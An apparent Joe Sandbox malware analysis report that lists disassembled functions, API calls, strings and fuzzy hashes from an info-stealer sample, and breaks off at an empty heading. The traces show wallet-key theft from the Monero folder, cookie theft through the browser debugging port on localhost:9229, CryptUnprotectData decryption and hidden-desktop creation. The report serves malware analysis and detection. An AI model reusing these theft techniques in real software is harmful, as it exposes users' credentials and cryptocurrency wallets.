Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4

Function 021A9E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 021A9E66
LocalAlloc.KERNEL32(00000040,?), ref: 021A9E7A
memcpy.MSVCRT(00000000,?), ref: 021A9E91
LocalFree.KERNEL32(?), ref: 021A9E9E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: 78737f94d74676c231c25ec0bfd87b895d2087a57efccd0331eb07772d9bd8c2
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: F9011D75A41305AFD7109BA4DC55FAEB779EB44700F104558FA04EB280DBB09A10CBE4

Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4

Function 021BCE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 021BCE6D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 021BCEAD
lstrcpyn.KERNEL32(?,?,00000104), ref: 021BCF30

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction ID: 77d53c9c8690aa3684fc8232b9d824c36e4aa4683aa52a06956da3d93b77087e
Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction Fuzzy Hash: E3313E71A40615BFD710DB94CC85FEAB7B9AB88B14F5041C9FA04EB290D7B0AE458BE0

Function 021C33F7 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 021C3426
wsprintfA.USER32 ref: 021C343C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5

Function 021C9A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 021C9AA7
free.MSVCRT ref: 021C9AAF
free.MSVCRT ref: 021C9AB7
free.MSVCRT ref: 021C9ABF
free.MSVCRT ref: 021C9AC7
free.MSVCRT ref: 021C9ACF
free.MSVCRT ref: 021C9AD6
free.MSVCRT ref: 021C9ADE
free.MSVCRT ref: 021C9AE6
free.MSVCRT ref: 021C9AEE
free.MSVCRT ref: 021C9AF6
free.MSVCRT ref: 021C9AFE
free.MSVCRT ref: 021C9B06
free.MSVCRT ref: 021C9B0E
free.MSVCRT ref: 021C9B16
free.MSVCRT ref: 021C9B1E
free.MSVCRT ref: 021C9B29
free.MSVCRT ref: 021C9B31
free.MSVCRT ref: 021C9B39
free.MSVCRT ref: 021C9B41
free.MSVCRT ref: 021C9B49
free.MSVCRT ref: 021C9B51
free.MSVCRT ref: 021C9B59
free.MSVCRT ref: 021C9B61
free.MSVCRT ref: 021C9B69
free.MSVCRT ref: 021C9B71
free.MSVCRT ref: 021C9B79
free.MSVCRT ref: 021C9B81
free.MSVCRT ref: 021C9B89
free.MSVCRT ref: 021C9B91
free.MSVCRT ref: 021C9B99
free.MSVCRT ref: 021C9BA1
free.MSVCRT ref: 021C9BAF
free.MSVCRT ref: 021C9BBA
free.MSVCRT ref: 021C9BC5
free.MSVCRT ref: 021C9BD0
free.MSVCRT ref: 021C9BDB
free.MSVCRT ref: 021C9BE6
free.MSVCRT ref: 021C9BF1
free.MSVCRT ref: 021C9BFC
free.MSVCRT ref: 021C9C07
free.MSVCRT ref: 021C9C12
free.MSVCRT ref: 021C9C1D
free.MSVCRT ref: 021C9C28
free.MSVCRT ref: 021C9C33
free.MSVCRT ref: 021C9C3E
free.MSVCRT ref: 021C9C49
free.MSVCRT ref: 021C9C54
free.MSVCRT ref: 021C9C62
free.MSVCRT ref: 021C9C6D
free.MSVCRT ref: 021C9C78
free.MSVCRT ref: 021C9C83
free.MSVCRT ref: 021C9C8E
free.MSVCRT ref: 021C9C99
free.MSVCRT ref: 021C9CA4
free.MSVCRT ref: 021C9CAF
free.MSVCRT ref: 021C9CBA
free.MSVCRT ref: 021C9CC5
free.MSVCRT ref: 021C9CD0
free.MSVCRT ref: 021C9CDB
free.MSVCRT ref: 021C9CE6
free.MSVCRT ref: 021C9CF1
free.MSVCRT ref: 021C9CFC
free.MSVCRT ref: 021C9D07
free.MSVCRT ref: 021C9D15
free.MSVCRT ref: 021C9D20
free.MSVCRT ref: 021C9D2B
free.MSVCRT ref: 021C9D36
free.MSVCRT ref: 021C9D41
free.MSVCRT ref: 021C9D4C
free.MSVCRT ref: 021C9D57
free.MSVCRT ref: 021C9D62
free.MSVCRT ref: 021C9D6D
free.MSVCRT ref: 021C9D78
free.MSVCRT ref: 021C9D83
free.MSVCRT ref: 021C9D8E
free.MSVCRT ref: 021C9D99
free.MSVCRT ref: 021C9DA4
free.MSVCRT ref: 021C9DAF
free.MSVCRT ref: 021C9DBA
free.MSVCRT ref: 021C9DC8
free.MSVCRT ref: 021C9DD3
free.MSVCRT ref: 021C9DDE
free.MSVCRT ref: 021C9DE9
free.MSVCRT ref: 021C9DF4
free.MSVCRT ref: 021C9DFF

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: dd5d82f98135757cb8a8d1d5cd30439797a4316754ccaa7bebb15ed7c276865a
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 6471F235490B049FD7A33B31DD01A4AFAAB7F20301F20CD1DA19A225F49FA76963DE51

Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040108A

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D

lstrcatA.KERNEL32(?,00000000), ref: 004010A0
lstrlenA.KERNEL32(?), ref: 004010AD
lstrcatA.KERNEL32(?,.keys), ref: 004010C8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
lstrlenA.KERNEL32(0091F588), ref: 0040110D
lstrcpy.KERNEL32(00000000,?), ref: 00401131
lstrcatA.KERNEL32(00000000,0091F588), ref: 00401139
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
lstrlenA.KERNEL32(00925328), ref: 004011EE
lstrcpy.KERNEL32(00000000,?), ref: 00401215
lstrcatA.KERNEL32(00000000,?), ref: 0040121D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
lstrcatA.KERNEL32(00000000), ref: 00401265
lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
lstrcpy.KERNEL32(00000000,?), ref: 004012E1
lstrcpy.KERNEL32(00000000,?), ref: 0040131D

Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

DeleteFileA.KERNEL32(?), ref: 00401351
memset.MSVCRT ref: 0040136E

Strings

\Monero\wallet.keys, xrefs: 0040113F, 0040116E
.keys, xrefs: 004010BC

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8

Function 021B5E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B5E7C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 021B5EAB
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5EDC
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F04
lstrcat.KERNEL32(00000000,00000000), ref: 021B5F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F37
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F6F
lstrcat.KERNEL32(00000000,00000000), ref: 021B5F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F9F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B5FD5
lstrcpy.KERNEL32(00000000,00000000), ref: 021B5FFD
lstrcat.KERNEL32(00000000,00000000), ref: 021B6008
lstrcpy.KERNEL32(00000000,00000000), ref: 021B602F
lstrlen.KERNEL32(00431D64), ref: 021B6041
lstrcpy.KERNEL32(00000000,00000000), ref: 021B6060
lstrcat.KERNEL32(00000000,00431D64), ref: 021B606C
lstrlen.KERNEL32(00638DD8), ref: 021B607B
lstrcpy.KERNEL32(00000000,00000000), ref: 021B609E
lstrcat.KERNEL32(00000000,00000000), ref: 021B60A9
lstrcpy.KERNEL32(00000000,00000000), ref: 021B60D3
lstrcpy.KERNEL32(00000000,00000000), ref: 021B60FF
GetFileAttributesA.KERNEL32(00000000), ref: 021B6106
lstrcpy.KERNEL32(00000000,?), ref: 021B615E
lstrcpy.KERNEL32(00000000,?), ref: 021B61CD
lstrcpy.KERNEL32(00000000,?), ref: 021B61FF
lstrcpy.KERNEL32(00000000,?), ref: 021B6242
lstrcpy.KERNEL32(00000000,00000000), ref: 021B626E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B62A6
lstrcpy.KERNEL32(00000000,?), ref: 021B6318
lstrcpy.KERNEL32(00000000,00000000), ref: 021B633C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction ID: 9005e91f6af93a4a04838346d4ff7f170a2160ce471f64fb031da00d9612ea13
Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction Fuzzy Hash: DA029174A412559FDB22AF78CC98AEEBBFAAF44308F144528E805E7650DB34D941CFA0

Function 021B6B07 Relevance: 43.9, APIs: 29, Instructions: 437stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B6B3C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B6B77
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 021B6BA1
lstrcpy.KERNEL32(00000000,00000000), ref: 021B6BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 021B6BFD
lstrcat.KERNEL32(00000000,00000000), ref: 021B6C05
lstrcpy.KERNEL32(00000000,00000000), ref: 021B6C2E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction ID: 326847a2addef685f8b36573e1b9ce120f93a1f6b1dde8f7e5a00b969ed19349
Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction Fuzzy Hash: 9FF19F74A412969FDB32EF79CC58AEE77BAAF54308F044428E815D7650DB38D901CFA0

Function 004092E0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155

strlen.MSVCRT ref: 00409311
strlen.MSVCRT ref: 0040932A

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

memset.MSVCRT ref: 00409371
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
lstrcatA.KERNEL32(?,00000000), ref: 004093A2
strlen.MSVCRT ref: 004093C9
strlen.MSVCRT ref: 00409416
memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
memset.MSVCRT ref: 00409562
lstrcatA.KERNEL32(?,cookies), ref: 00409577
lstrcatA.KERNEL32(?,00431D64), ref: 00409589
lstrcatA.KERNEL32(?,?), ref: 0040959A
lstrcatA.KERNEL32(?,00435160), ref: 004095AC
lstrcatA.KERNEL32(?,?), ref: 004095BD
lstrcatA.KERNEL32(?,.txt), ref: 004095CF
lstrlenA.KERNEL32(?), ref: 004095E6
lstrlenA.KERNEL32(?), ref: 0040960B
lstrcpy.KERNEL32(00000000,?), ref: 00409644
memset.MSVCRT ref: 0040968C

Strings

/devtools, xrefs: 00409325, 00409330
ws://localhost:9229, xrefs: 00409380
cookies, xrefs: 0040956B
localhost, xrefs: 004092FA, 00409318
.txt, xrefs: 004095C3

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2819545660-3542011879
Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98

Function 021C1E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 021C6680
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 021C6699
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 021C66B1
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 021C66C9
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 021C66E2
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 021C66FA
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 021C6712
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 021C672B
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 021C6743
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 021C675B
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 021C6774
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 021C678C
Part of subcall function 021C6627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 021C67A4

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C1E76
GetUserDefaultLangID.KERNEL32 ref: 021C1E7C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: AddressProc$DefaultLangUserlstrcpy
String ID:
API String ID: 4154271814-0
Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction ID: fa000638d97042937ed61ac6bf914186806d53d4e9e73ff39b3e4ddfa2f776a0
Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction Fuzzy Hash: FF619F39580216AFDB21ABB0DC88B6E7BBBAF55749F24102CF809D3161DB74D805DFA0

Function 021A9A03 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 238stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 021A9A3F
lstrcat.KERNEL32(?,?), ref: 021A9A54
lstrcat.KERNEL32(?,0043516C), ref: 021A9A67

Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021C40AC
Part of subcall function 021C4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 021C40D6
Part of subcall function 021C4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,021A1495,?,0000001A), ref: 021C40E0

wsprintfA.USER32 ref: 021A9AAD
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 021A9AD0
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 021A9AEF
memset.MSVCRT ref: 021A9B0D
lstrcat.KERNEL32(?,?), ref: 021A9B22
lstrcat.KERNEL32(?,?), ref: 021A9B34
lstrcat.KERNEL32(?,00435128), ref: 021A9B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 021A9B81
lstrcpy.KERNEL32(00000000,?), ref: 021A9BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 021A9BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 021A9BE9
lstrlen.KERNEL32(?), ref: 021A9BFD
wsprintfA.USER32 ref: 021A9C0D
lstrcpy.KERNEL32(?,?), ref: 021A9C24
memset.MSVCRT ref: 021A9C3A

Strings

